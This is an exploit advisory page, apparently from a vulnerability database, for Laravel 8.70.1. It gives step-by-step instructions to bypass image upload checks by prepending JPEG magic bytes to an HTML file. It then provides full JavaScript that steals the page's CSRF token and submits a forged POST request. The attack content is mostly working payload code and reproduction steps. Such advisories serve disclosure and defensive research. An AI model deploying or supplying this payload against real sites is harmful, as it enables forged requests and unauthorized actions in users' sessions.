PHP Laravel 8.70.1 Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

2021.11.15
Credit: Hosein Vita
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) # Date: 14/11/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://laravel.com/ # Software Link: https://laravel.com/docs/4.2 # Version: Laravel Framework 8.70.1 # Tested on: Windows/Linux # Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server # which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b # Steps to reproduce: 1- Use HxD tool and add FF D8 FF E0 at the very begining of your file 2- Use code below to bypass csrf token ÿØÿà<html> <head> <title>Laravel Csrf Bypass</title> </head> <body> <script> function submitFormWithTokenJS(token) { var xhr = new XMLHttpRequest(); xhr.open("POST", POST_URL, true); // Send the proper header information along with the request xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); // This is for debugging and can be removed xhr.onreadystatechange = function() { if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { console.log(xhr.responseText); } } // xhr.send("_token=" + token + "&desiredParameter=desiredValue"); } function getTokenJS() { var xhr = new XMLHttpRequest(); // This tels it to return it as a HTML document xhr.responseType = "document"; // true on the end of here makes the call asynchronous //Edit the path as you want xhr.open("GET", "/image-upload", true); xhr.onload = function (e) { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { // Get the document from the response page = xhr.response // Get the input element input = page.getElementsByTagName("input")[0]; // Show the token alert("The token is: " + input.value); // Use the token to submit the form submitFormWithTokenJS(input.value); } }; // Make the request xhr.send(null); } getTokenJS(); var POST_URL="/" getTokenJS(); </script> </html> 3- Save it as Html file and upload it.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top